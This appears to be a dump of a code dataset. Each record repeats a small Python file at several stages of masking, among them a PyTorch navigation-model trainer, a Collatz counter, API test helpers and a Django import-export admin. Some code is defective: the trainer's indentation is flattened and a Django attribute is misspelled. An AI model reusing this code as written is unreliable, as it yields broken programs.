block_size=block_size,
output_type=output_type,
resolution=resolution,
depth=depth,
best_epoch=best_epoch,
seed=seed,
zero_weight=zero_weight)
self.f1_metric = F1Metric()
self.dataset_reader = dataset_reader
self.batch_size = batch_size
self.checkpoint_every = checkpoint_every
self.validation_limit = validation_limit
        # guard against the None defaults before the numeric comparison (None < 0 raises TypeError on Python 3)
        if debug_image_top_k is not None and debug_image_top_k < 0:
            debug_image_top_k = None
        if debug_image_threshold is not None and debug_image_threshold < 0:
            debug_image_threshold = None
self.debug_image_top_k = debug_image_top_k
self.debug_image_threshold = debug_image_threshold
def split_large_batch(self, batch):
large_bsz = batch['path_state'].shape[0]
small_batches = []
for i in range(0, large_bsz, self.batch_size):
small_batch = {}
for k in batch.keys():
small_batch[k] = batch[k][i:i+self.batch_size]
small_batches.append(small_batch)
return small_batches
def validate_one_epoch(self, epoch, step, validation_limit):
print(f"Validating epoch {epoch} step {step}...")
total_prev_acc, total_next_acc = 0.0, 0.0
total = 0
self.encoder.eval()
for b, dev_batch_instance in enumerate(self.dataset_reader.read("dev", validation_limit)):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, epoch, b, 0)
total_next_acc += score_dict['next_f1']
total += 1
mean_next_acc = total_next_acc / total
return mean_next_acc
def evaluate(self):
total_acc = 0.0
total = 0
total_block_acc = 0.0
self.encoder.eval()
for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.read("dev", self.validation_limit))):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, 10, b, 0, self.debug_image_top_k, self.debug_image_threshold)
total_acc += score_dict['next_f1']
total += 1
mean_acc = total_acc / total
print(f"Test-time pixel acc {mean_acc * 100}")
return mean_acc
def train_and_validate_one_epoch(self, epoch):
print(f"Training epoch {epoch}...")
self.encoder.train()
skipped = 0
step = 0
for b, batch_instance in enumerate(self.dataset_reader.read("train")):
actual_batches = self.split_large_batch(batch_instance)
for sb, small_batch in enumerate(actual_batches):
is_best = False
self.optimizer.zero_grad()
outputs = self.encoder(small_batch)
# skip bad examples
if outputs is None:
skipped += 1
continue
loss = self.compute_patch_loss(small_batch, outputs, self.next_to_prev_weight)
loss.backward()
self.optimizer.step()
it = (epoch + 1) * (step+1)
self.scheduler.step_batch(it)
#print(f"step: {step+1} checkpoint_every: {self.checkpoint_every} {(step +1) % self.checkpoint_every}")
if (step+1) % self.checkpoint_every == 0:
step_acc = self.validate_one_epoch(epoch, step, self.validation_limit)
print(f"Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}")
if step_acc > self.best_score:
is_best = True
self.best_score = step_acc
self.save_model(f"{epoch}_{step}", is_best)
step += 1
print(f"skipped {skipped} examples")
epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.validation_limit)
print(f"Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}")
if self.score_type == "acc":
return (epoch_acc)/2, -1.0
else:
raise AssertionError(f"invalid score type {self.score_type}")
def compute_patch_loss(self, inputs, outputs, next_to_prev_weight = [1.0, 1.0]):
"""
compute per-patch for each patch
"""
bsz, w, h, __ = inputs['input_image'].shape
pred_next_image = outputs["next_position"]
path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()
true_next_image = image_to_tiles(path_state, self.patch_size)
# binarize patches
next_sum_image = torch.sum(true_next_image, dim = 2, keepdim=True)
next_patches = torch.zeros_like(next_sum_image)
# any patch that has a 1 pixel in it gets 1
next_patches[next_sum_image != 0] = 1
pred_next_image = pred_next_image.squeeze(-1)
next_patches = next_patches.squeeze(-1).to(self.device).long()
pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')
next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image, next_patches)
total_loss = next_pixel_loss
print(f"loss {total_loss.item()}")
return total_loss
def generate_debugging_image(self,
true_img,
path_state,
pred_path,
out_path,
caption = None,
top_k = None,
threshold = None):
caption = self.wrap_caption(caption)
fig, ax = plt.subplots(2,2, figsize=(16,16))
# gs = gridspec.GridSpec(2, 2, width_ratios=[2, 1])
text_ax = ax[0,1]
text_ax.axis([0, 1, 0, 1])
text_ax.text(0.2, 0.02, caption, fontsize = 12)
text_ax.axis("off")
props = dict(boxstyle='round',
facecolor='wheat', alpha=0.5)
text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,
verticalalignment='top', bbox=props)
# img_ax = plt.subplot(gs[2])
img_ax = ax[1,0]
#w = int(40 * (self.resolution / 224))
true_img = true_img.detach().cpu().numpy().astype(float)[:,:,0:3]
img_ax.imshow(true_img)
true_path = path_state.detach().numpy()
true_path = np.tile(true_path.reshape(512, 512, 1), (1,1,3)).astype(float)
true_ax = ax[0,0]
true_ax.imshow(true_path)
pred_path = torch.softmax(pred_path, dim=0)
pred_path = pred_path[1,:,:]
pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)
if top_k is not None:
top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]
top_k_inds = np.unravel_index(top_k_inds, shape = (512, 512))
pred_path[top_k_inds] = 1.1
pred_path[pred_path<1.0] = 0
pred_path[top_k_inds] = 1.0
elif threshold is not None:
pred_path[pred_path < threshold] = 0
else:
pred_path = pred_path
pred_path = np.tile(pred_path, (1,1,3)).astype(float)
pred_ax = ax[1,1]
pred_ax.imshow(pred_path)
file_path = f"{out_path}.png"
print(f"saving to {file_path}")
plt.savefig(file_path)
plt.close()
    # top_k/threshold default to None so validate_one_epoch's four-argument call doesn't raise TypeError
    def validate(self, batch_instance, epoch_num, batch_num, instance_num, top_k=None, threshold=None):
self.encoder.eval()
outputs = self.encoder(batch_instance)
next_position = outputs['next_position']
next_position = tiles_to_image(next_position, self.patch_size, output_type="per-patch", upsample=True)
# f1 metric
next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance["path_state"].unsqueeze(-1), next_position)
if epoch_num > self.generate_after_n:
for i in range(outputs["next_position"].shape[0]):
output_path = self.checkpoint_dir.joinpath(f"batch_{batch_num}").joinpath(f"instance_{i}")
output_path.mkdir(parents = True, exist_ok=True)
command = batch_instance["command"][i]
command = [x for x in command if x != "<PAD>"]
command = " ".join(command)
image = batch_instance['input_image'][i]
path_state = batch_instance["path_state"][i]
pred_path = next_position[i]
self.generate_debugging_image(image,
path_state,
pred_path,
output_path,
caption = command,
top_k = top_k,
threshold = threshold)
return {"next_f1": next_f1}
def compute_f1(self, true_pos, pred_pos):
eps = 1e-8
values, pred_pixels = torch.max(pred_pos, dim=1)
gold_pixels = true_pos
pred_pixels = pred_pixels.unsqueeze(1)
pred_pixels = pred_pixels.detach().cpu().float()
gold_pixels = gold_pixels.detach().cpu().float()
total_pixels = sum(pred_pixels.shape)
true_pos = torch.sum(pred_pixels * gold_pixels).item()
true_neg = torch.sum((1-pred_pixels) * (1 - gold_pixels)).item()
false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()
false_neg = torch.sum((1-pred_pixels) * gold_pixels).item()
precision = true_pos / (true_pos + false_pos + eps)
recall = true_pos / (true_pos + false_neg + eps)
f1 = 2 * (precision * recall) / (precision + recall + eps)
return precision, recall, f1
def main(args):
device = "cpu"
if args.cuda is not None:
free_gpu_id = get_free_gpu()
if free_gpu_id > -1:
device = f"cuda:{free_gpu_id}"
#device = "cuda:0"
device = torch.device(device)
print(f"On device {device}")
#test = torch.ones((1))
#test = test.to(device)
nlp = English()
tokenizer = Tokenizer(nlp.vocab)
dataset_reader = NavigationDatasetReader(dir = args.data_dir,
out_path = args.out_path,
path_width = args.path_width,
read_limit = args.read_limit,
batch_size = args.batch_size,
max_len = args.max_len,
tokenizer = tokenizer,
shuffle = args.shuffle,
overfit = args.overfit,
is_bert = "bert" in args.embedder)
checkpoint_dir = pathlib.Path(args.checkpoint_dir)
if not checkpoint_dir.exists():
checkpoint_dir.mkdir()
if not args.test:
with open(dataset_reader.path_dict['train'].joinpath("vocab.json")) as f1:
train_vocab = json.load(f1)
with open(checkpoint_dir.joinpath("vocab.json"), "w") as f1:
json.dump(list(train_vocab), f1)
else:
print(f"Reading vocab from {checkpoint_dir}")
with open(checkpoint_dir.joinpath("vocab.json")) as f1:
train_vocab = json.load(f1)
print(f"got data")
# construct the vocab and tokenizer
print(f"constructing model...")
# get the embedder from args
if args.embedder == "random":
embedder = RandomEmbedder(tokenizer, train_vocab, args.embedding_dim, trainable=True)
elif args.embedder == "glove":
embedder = GloveEmbedder(tokenizer, train_vocab, args.embedding_file, args.embedding_dim, trainable=True)
elif args.embedder.startswith("bert"):
embedder = BERTEmbedder(model_name = args.embedder, max_seq_len = args.max_len)
else:
raise NotImplementedError(f"No embedder {args.embedder}")
depth = 1
encoder_cls = NavigationTransformerEncoder
encoder_kwargs = dict(image_size = args.resolution,
patch_size = args.patch_size,
language_embedder = embedder,
n_layers = args.n_layers,
channels = args.channels,
n_heads = args.n_heads,
hidden_dim = args.hidden_dim,
ff_dim = args.ff_dim,
dropout = args.dropout,
embed_dropout = args.embed_dropout,
output_type = args.output_type,
positional_encoding_type = args.pos_encoding_type,
device = device,
log_weights = args.test,
locality_mask = args.locality_mask,
locality_neighborhood = args.locality_neighborhood,
init_scale = args.init_scale)
# Initialize encoder
encoder = encoder_cls(**encoder_kwargs)
if args.cuda is not None:
encoder = encoder.cuda(device)
print(encoder)
# construct optimizer
optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)
# scheduler
scheduler = NoamLR(optimizer, model_size = args.hidden_dim, warmup_steps = args.warmup, factor = args.lr_factor)
best_epoch = -1
block_size = int((args.resolution * 4)/64)
if not args.test:
if not args.resume:
try:
os.mkdir(args.checkpoint_dir)
except FileExistsError:
# file exists
try:
assert(len(glob.glob(os.path.join(args.checkpoint_dir, "*.th"))) == 0)
except AssertionError:
raise AssertionError(f"Output directory {args.checkpoint_dir} non-empty, will not overwrite!")
else:
# resume from pre-trained
encoder = encoder.to("cpu")
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath("best.th"), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
# get training info
best_checkpoint_data = json.load(open(pathlib.Path(args.checkpoint_dir).joinpath("best_training_state.json")))
print(f"best_checkpoint_data {best_checkpoint_data}")
best_epoch = best_checkpoint_data["epoch"]
# save arg config to checkpoint_dir
with open(pathlib.Path(args.checkpoint_dir).joinpath("config.yaml"), "w") as f1:
dump_args = copy.deepcopy(args)
# drop stuff we can't serialize
del(dump_args.__dict__["cfg"])
del(dump_args.__dict__["__cwd__"])
del(dump_args.__dict__["__path__"])
to_dump = dump_args.__dict__
# dump
yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)
else:
# test-time, load best model
print(f"loading model weights from {args.checkpoint_dir}")
#state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath("best.th"))
#encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.to("cpu")
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath("best.th"), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
num_blocks = 1
# construct trainer
trainer = NavigationTransformerTrainer(dataset_reader = dataset_reader,
encoder = encoder,
optimizer = optimizer,
scheduler = scheduler,
num_epochs = args.num_epochs,
num_blocks = num_blocks,
device = device,
checkpoint_dir = args.checkpoint_dir,
checkpoint_every = args.checkpoint_every,
validation_limit = args.validation_limit,
num_models_to_keep = args.num_models_to_keep,
generate_after_n = args.generate_after_n,
score_type=args.score_type,
depth = depth,
resolution = args.resolution,
output_type = args.output_type,
patch_size = args.patch_size,
block_size = block_size,
best_epoch = best_epoch,
seed = args.seed,
zero_weight = args.zero_weight,
debug_image_top_k = args.debug_image_top_k,
debug_image_threshold = args.debug_image_threshold)
if not args.test:
trainer.train()
else:
print(f"evaluating")
acc = trainer.evaluate()
print(f"accuracy: {acc}")
if __name__ == "__main__":
np.random.seed(12)
torch.manual_seed(12)
parser = configure_parser()
args = parser.parse_args()
main(args)
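# --- Editorial sketch (not part of the original script): a toy walk-through of
# the precision/recall/F1 arithmetic used by compute_f1 above. All tensor
# values below are made up for illustration; only torch is required.
def _f1_toy_example():
    import torch
    eps = 1e-8
    gold = torch.tensor([[1., 0., 1., 0.]])  # ground-truth pixel mask
    pred = torch.tensor([[1., 1., 0., 0.]])  # binarized prediction
    tp = torch.sum(pred * gold).item()        # 1 true positive
    fp = torch.sum(pred * (1 - gold)).item()  # 1 false positive
    fn = torch.sum((1 - pred) * gold).item()  # 1 false negative
    precision = tp / (tp + fp + eps)          # 0.5
    recall = tp / (tp + fn + eps)             # 0.5
    return 2 * precision * recall / (precision + recall + eps)  # F1 = 0.5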
| [
10,
11,
12,
13,
15
] |
643 | 104c49941a79948749b27217a0c728f19435f77a | <mask token>
| <mask token>
print(z)
| <mask token>
x = int(raw_input('Please supply a number: '))
y = int(raw_input('Please supply a second number: '))
z = random.randint(x, y)
print(z)
| import random
x = int(raw_input('Please supply a number: '))
y = int(raw_input('Please supply a second number: '))
z = random.randint(x, y)
print(z)
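# --- Editorial note: raw_input is Python 2 only; on Python 3 the equivalent is
# input(). random.randint(x, y) is inclusive on both ends and raises ValueError
# when x > y. A Python 3 sketch with a reversed-bounds guard (the guard is an
# addition, not in the original) might look like:
#
#     import random
#     x = int(input('Please supply a number: '))
#     y = int(input('Please supply a second number: '))
#     lo, hi = min(x, y), max(x, y)
#     print(random.randint(lo, hi))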
| null | [
0,
1,
2,
3
] |
644 | 3605f46da25eb98767ca8d7248beaa07572d3171 | <mask token>
| <mask token>
for line in open('9.in'):
if line:
processing_pattern = False
new_line = ''
for idx, char in enumerate(line):
pattern_found = False
if line[idx] == '(' and line[idx + 1].isnumeric() and line[idx + 2
] == 'x' and line[idx + 3].isnumeric() and line[idx + 4
] == ')':
pattern_found = True
num_chars = int(line[idx + 1])
repeat_times = int(line[idx + 3])
else:
new_line += char
processed_lines.append(new_line)
| processed_lines = []
for line in open('9.in'):
if line:
processing_pattern = False
new_line = ''
for idx, char in enumerate(line):
pattern_found = False
if line[idx] == '(' and line[idx + 1].isnumeric() and line[idx + 2
] == 'x' and line[idx + 3].isnumeric() and line[idx + 4
] == ')':
pattern_found = True
num_chars = int(line[idx + 1])
repeat_times = int(line[idx + 3])
else:
new_line += char
processed_lines.append(new_line)
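# --- Editorial sketch (assumption: the partial loop above is building toward
# "(NxM)" marker decompression, as in Advent of Code 2016 day 9). The
# single-character indexing above cannot handle multi-digit markers such as
# (10x2); a regex scan is more robust:
import re

def decompress(s):
    out, i = [], 0
    while i < len(s):
        m = re.match(r'\((\d+)x(\d+)\)', s[i:])
        if m:
            num_chars, repeat_times = int(m.group(1)), int(m.group(2))
            start = i + m.end()
            out.append(s[start:start + num_chars] * repeat_times)
            i = start + num_chars
        else:
            out.append(s[i])
            i += 1
    return ''.join(out)
# e.g. decompress('A(2x2)BCD(2x2)EFG') == 'ABCBCDEFEFG'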
| null | null | [
0,
1,
2
] |
645 | e7db3390d30f86e19eee930c48e5f848f41cc579 | <mask token>
| <mask token>
while True:
if c0 % 2 == 0:
c0 //= 2
if c0 != 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
continue
elif c0 == 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
break
elif c0 % 2 == 1:
c0 = c0 * 3 + 1
if c0 != 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
continue
elif c0 == 1:
step += 1
print(' New value is ', c0, ':', 'step:', step)
break
print('Total Steps: ', step)
| c0 = int(input('Enter a non-negative, non-zero integer: '))
step = 0
while True:
if c0 % 2 == 0:
c0 //= 2
if c0 != 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
continue
elif c0 == 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
break
elif c0 % 2 == 1:
c0 = c0 * 3 + 1
if c0 != 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
continue
elif c0 == 1:
step += 1
print(' New value is ', c0, ':', 'step:', step)
break
print('Total Steps: ', step)
| # take any non-negative and non-zero integer number and name it c0; if it's even, evaluate a new c0 as c0 ÷ 2;
# otherwise, if it's odd, evaluate a new c0 as 3 × c0 + 1;
# if c0 ≠ 1, skip to point 2.
# The hypothesis says that regardless of the initial value of c0,it will always go to 1.
# Write a program which reads one natural number and executes the above steps as long as c0 remains different from 1.
# We also want you to count the steps needed to achieve the goal. Your code should output all the intermediate values of c0, too.
c0 = int(input('Enter a non-negative, non-zero integer: '))
step = 0
while True:
if c0 % 2 == 0:
c0 //= 2
if c0 != 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
continue
elif c0 == 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
break
elif c0 % 2 == 1:
c0 = c0 * 3 + 1
if c0 != 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
continue
elif c0 == 1:
step += 1
print(' New value is ', c0, ':', 'step:', step)
break
print('Total Steps: ', step)
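# --- Editorial sketch: the same hypothesis with the duplicated even/odd
# branches folded into one loop body (behavior-equivalent for inputs > 1):
def collatz_steps(n, verbose=False):
    steps = 0
    while n != 1:
        n = n // 2 if n % 2 == 0 else 3 * n + 1
        steps += 1
        if verbose:
            print(' New value is ', n, ':', 'step', steps)
    return steps
# e.g. collatz_steps(16) == 4   (16 -> 8 -> 4 -> 2 -> 1)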
| null | [
0,
1,
2,
3
] |
646 | c455de70a79f70f5f0e21391511f5035f1b4feb9 | <mask token>
class Base(unittest.TestCase):
<mask token>
def setUp(self):
self.schemas = {}
self.session = requests.Session()
self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})
self.addCleanup(self.close_session)
def close_session(self):
self.session.close()
@property
def root(self):
"""Return the API root data."""
try:
return self._root
except AttributeError:
response = self.GET(SETTINGS['ROOT_URL'])
self.assertEqual(response.status_code, http.client.OK)
self._root = self.check_schema(response)
return self._root
def GET(self, url):
return self.session.get(url)
<mask token>
<mask token>
def DELETE(self, url):
return self.session.delete(url)
def check_schema(self, response):
"""Check that the response JSON data matches the schema
linked to in the response header.
Return the response JSON.
"""
self.assertEqual(response.status_code, http.client.OK)
result = response.json()
url = response.links['schema']['url']
try:
schema = self.schemas[url]
except KeyError:
r = self.GET(url)
self.assertEqual(r.status_code, http.client.OK)
schema = r.json()
self.schemas[url] = schema
self.validate_schema(result, schema)
return result
def validate_schema(self, instance, schema):
"""Validate the JSON instance versus the given JSON schema."""
jsonschema.validate(instance=instance, schema=schema,
format_checker=jsonschema.draft7_format_checker)
| <mask token>
def process_args(filepath=None):
"""Process command-line arguments for this test suite.
Reset the settings and read the given settings file.
Return the unused arguments.
"""
if filepath is None:
parser = argparse.ArgumentParser()
parser.add_argument('-S', '--settings', dest='settings', metavar=
'FILE', default='settings.json', help='Settings file')
parser.add_argument('unittest_args', nargs='*')
options, args = parser.parse_known_args()
filepath = options.settings
args = [sys.argv[0]] + args
else:
args = sys.argv
SETTINGS.update(DEFAULT_SETTINGS)
with open(filepath) as infile:
SETTINGS.update(json.load(infile))
assert SETTINGS['USERNAME']
assert SETTINGS['APIKEY']
return args
<mask token>
class Base(unittest.TestCase):
"""Base class for Symbasis test cases."""
def setUp(self):
self.schemas = {}
self.session = requests.Session()
self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})
self.addCleanup(self.close_session)
def close_session(self):
self.session.close()
@property
def root(self):
"""Return the API root data."""
try:
return self._root
except AttributeError:
response = self.GET(SETTINGS['ROOT_URL'])
self.assertEqual(response.status_code, http.client.OK)
self._root = self.check_schema(response)
return self._root
def GET(self, url):
return self.session.get(url)
def POST(self, url, json=None):
return self.session.post(url, json=json)
def PUT(self, url):
return self.session.put(url)
def DELETE(self, url):
return self.session.delete(url)
def check_schema(self, response):
"""Check that the response JSON data matches the schema
linked to in the response header.
Return the response JSON.
"""
self.assertEqual(response.status_code, http.client.OK)
result = response.json()
url = response.links['schema']['url']
try:
schema = self.schemas[url]
except KeyError:
r = self.GET(url)
self.assertEqual(r.status_code, http.client.OK)
schema = r.json()
self.schemas[url] = schema
self.validate_schema(result, schema)
return result
def validate_schema(self, instance, schema):
"""Validate the JSON instance versus the given JSON schema."""
jsonschema.validate(instance=instance, schema=schema,
format_checker=jsonschema.draft7_format_checker)
| <mask token>
def process_args(filepath=None):
"""Process command-line arguments for this test suite.
Reset the settings and read the given settings file.
Return the unused arguments.
"""
if filepath is None:
parser = argparse.ArgumentParser()
parser.add_argument('-S', '--settings', dest='settings', metavar=
'FILE', default='settings.json', help='Settings file')
parser.add_argument('unittest_args', nargs='*')
options, args = parser.parse_known_args()
filepath = options.settings
args = [sys.argv[0]] + args
else:
args = sys.argv
SETTINGS.update(DEFAULT_SETTINGS)
with open(filepath) as infile:
SETTINGS.update(json.load(infile))
assert SETTINGS['USERNAME']
assert SETTINGS['APIKEY']
return args
def run():
unittest.main(argv=process_args())
class Base(unittest.TestCase):
"""Base class for Symbasis test cases."""
def setUp(self):
self.schemas = {}
self.session = requests.Session()
self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})
self.addCleanup(self.close_session)
def close_session(self):
self.session.close()
@property
def root(self):
"""Return the API root data."""
try:
return self._root
except AttributeError:
response = self.GET(SETTINGS['ROOT_URL'])
self.assertEqual(response.status_code, http.client.OK)
self._root = self.check_schema(response)
return self._root
def GET(self, url):
return self.session.get(url)
def POST(self, url, json=None):
return self.session.post(url, json=json)
def PUT(self, url):
return self.session.put(url)
def DELETE(self, url):
return self.session.delete(url)
def check_schema(self, response):
"""Check that the response JSON data matches the schema
linked to in the response header.
Return the response JSON.
"""
self.assertEqual(response.status_code, http.client.OK)
result = response.json()
url = response.links['schema']['url']
try:
schema = self.schemas[url]
except KeyError:
r = self.GET(url)
self.assertEqual(r.status_code, http.client.OK)
schema = r.json()
self.schemas[url] = schema
self.validate_schema(result, schema)
return result
def validate_schema(self, instance, schema):
"""Validate the JSON instance versus the given JSON schema."""
jsonschema.validate(instance=instance, schema=schema,
format_checker=jsonschema.draft7_format_checker)
| <mask token>
SCHEMA_LINK_RX = re.compile('<([^>]+)>; rel="([^"]+)"')
JSON_MIMETYPE = 'application/json'
DEFAULT_SETTINGS = {'ROOT_URL': 'http://127.0.0.1:5002/api', 'USERNAME':
None, 'APIKEY': None}
SETTINGS = {}
def process_args(filepath=None):
"""Process command-line arguments for this test suite.
Reset the settings and read the given settings file.
Return the unused arguments.
"""
if filepath is None:
parser = argparse.ArgumentParser()
parser.add_argument('-S', '--settings', dest='settings', metavar=
'FILE', default='settings.json', help='Settings file')
parser.add_argument('unittest_args', nargs='*')
options, args = parser.parse_known_args()
filepath = options.settings
args = [sys.argv[0]] + args
else:
args = sys.argv
SETTINGS.update(DEFAULT_SETTINGS)
with open(filepath) as infile:
SETTINGS.update(json.load(infile))
assert SETTINGS['USERNAME']
assert SETTINGS['APIKEY']
return args
def run():
unittest.main(argv=process_args())
class Base(unittest.TestCase):
"""Base class for Symbasis test cases."""
def setUp(self):
self.schemas = {}
self.session = requests.Session()
self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})
self.addCleanup(self.close_session)
def close_session(self):
self.session.close()
@property
def root(self):
"""Return the API root data."""
try:
return self._root
except AttributeError:
response = self.GET(SETTINGS['ROOT_URL'])
self.assertEqual(response.status_code, http.client.OK)
self._root = self.check_schema(response)
return self._root
def GET(self, url):
return self.session.get(url)
def POST(self, url, json=None):
return self.session.post(url, json=json)
def PUT(self, url):
return self.session.put(url)
def DELETE(self, url):
return self.session.delete(url)
def check_schema(self, response):
"""Check that the response JSON data matches the schema
linked to in the response header.
Return the response JSON.
"""
self.assertEqual(response.status_code, http.client.OK)
result = response.json()
url = response.links['schema']['url']
try:
schema = self.schemas[url]
except KeyError:
r = self.GET(url)
self.assertEqual(r.status_code, http.client.OK)
schema = r.json()
self.schemas[url] = schema
self.validate_schema(result, schema)
return result
def validate_schema(self, instance, schema):
"""Validate the JSON instance versus the given JSON schema."""
jsonschema.validate(instance=instance, schema=schema,
format_checker=jsonschema.draft7_format_checker)
| "Base class for tests."
import argparse
import http.client
import json
import os
import re
import sys
import unittest
import jsonschema
import requests
SCHEMA_LINK_RX = re.compile(r'<([^>]+)>; rel="([^"]+)"')
JSON_MIMETYPE = 'application/json'
DEFAULT_SETTINGS = {
'ROOT_URL': 'http://127.0.0.1:5002/api',
'USERNAME': None, # Needs to be set! Must have admin privileges.
'APIKEY': None # Needs to be set! For the above user.
}
# The actual settings to use.
SETTINGS = {}
def process_args(filepath=None):
"""Process command-line arguments for this test suite.
Reset the settings and read the given settings file.
Return the unused arguments.
"""
if filepath is None:
parser = argparse.ArgumentParser()
parser.add_argument('-S', '--settings', dest='settings',
metavar='FILE', default='settings.json',
help='Settings file')
parser.add_argument('unittest_args', nargs='*')
options, args = parser.parse_known_args()
filepath = options.settings
args = [sys.argv[0]] + args
else:
args = sys.argv
SETTINGS.update(DEFAULT_SETTINGS)
with open(filepath) as infile:
SETTINGS.update(json.load(infile))
assert SETTINGS['USERNAME']
assert SETTINGS['APIKEY']
return args
def run():
unittest.main(argv=process_args())
class Base(unittest.TestCase):
"Base class for Symbasis test cases."
def setUp(self):
self.schemas = {}
self.session = requests.Session()
self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})
self.addCleanup(self.close_session)
def close_session(self):
self.session.close()
@property
def root(self):
"Return the API root data."
try:
return self._root
except AttributeError:
response = self.GET(SETTINGS['ROOT_URL'])
self.assertEqual(response.status_code, http.client.OK)
self._root = self.check_schema(response)
return self._root
def GET(self, url):
return self.session.get(url)
def POST(self, url, json=None):
return self.session.post(url, json=json)
def PUT(self, url):
return self.session.put(url)
def DELETE(self, url):
return self.session.delete(url)
def check_schema(self, response):
"""Check that the response JSON data matches the schema
linked to in the response header.
Return the response JSON.
"""
self.assertEqual(response.status_code, http.client.OK)
result = response.json()
url = response.links['schema']['url']
try:
schema = self.schemas[url]
except KeyError:
r = self.GET(url)
self.assertEqual(r.status_code, http.client.OK)
schema = r.json()
self.schemas[url] = schema
self.validate_schema(result, schema)
return result
def validate_schema(self, instance, schema):
"Validate the JSON instance versus the given JSON schema."
jsonschema.validate(instance=instance,
schema=schema,
format_checker=jsonschema.draft7_format_checker)
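# --- Editorial sketch (the assertion detail is an assumption, not part of this
# module): a concrete suite subclasses Base, leans on the schema-checked
# helpers, and is launched with run() from its own __main__ block.
class RootTest(Base):
    "Check that the API root is reachable and matches its linked schema."
    def test_root(self):
        data = self.check_schema(self.GET(SETTINGS['ROOT_URL']))
        self.assertTrue(data)  # assumption: the root returns a non-empty document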
| [
8,
12,
13,
14,
16
] |
647 | 630480e9458491a26ea9060bd36541a0d5805a11 | <mask token>
| <mask token>
def kind():
data = {}
with open('dataset.json', 'r') as read_file:
data = json.load(read_file)
return data['kind']
<mask token>
| <mask token>
def kind():
data = {}
with open('dataset.json', 'r') as read_file:
data = json.load(read_file)
return data['kind']
def items():
data = {}
with open('dataset.json', 'r') as read_file:
data = json.load(read_file)
return data['items']
| import urllib.request
import json
def kind():
data = {}
with open('dataset.json', 'r') as read_file:
data = json.load(read_file)
return data['kind']
def items():
data = {}
with open('dataset.json', 'r') as read_file:
data = json.load(read_file)
return data['items']
| import urllib.request
import json
def kind():
data={}
with open("dataset.json", "r") as read_file:
data = json.load(read_file)
return data["kind"]
def items():
data={}
with open("dataset.json", "r") as read_file:
data = json.load(read_file)
return data["items"]
# Can add a bunch of other things after referring to data
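# --- Editorial sketch (assumption: urllib.request was imported above in order
# to fetch dataset.json before parsing; the URL comes from the caller and is
# not taken from this file):
def fetch_dataset(url, dest='dataset.json'):
    urllib.request.urlretrieve(url, dest)  # download the JSON document to disk
    return dest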
| [
0,
1,
2,
3,
4
] |
648 | 016b64a2eb4af3034d54272c878fb917506d330c | <mask token>
class DataResource(resources.ModelResource):
<mask token>
<mask token>
<mask token>
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
    resource_class = DataResource
<mask token>
| <mask token>
class DataResource(resources.ModelResource):
groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute=
'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
    resource_class = DataResource
<mask token>
| <mask token>
class DataResource(resources.ModelResource):
groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute=
'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
    resource_class = DataResource
admin.site.register(Data, DataAdmin)
| from import_export.admin import ImportExportMixin
from django.contrib import admin
from import_export import resources, widgets, fields
from .models import Addgroup, Addsystemname, Zhuanzhebushi, Yewuzerenbumen, czyylx, Zhuanze, Data
from import_export import fields, resources
from import_export.widgets import ForeignKeyWidget
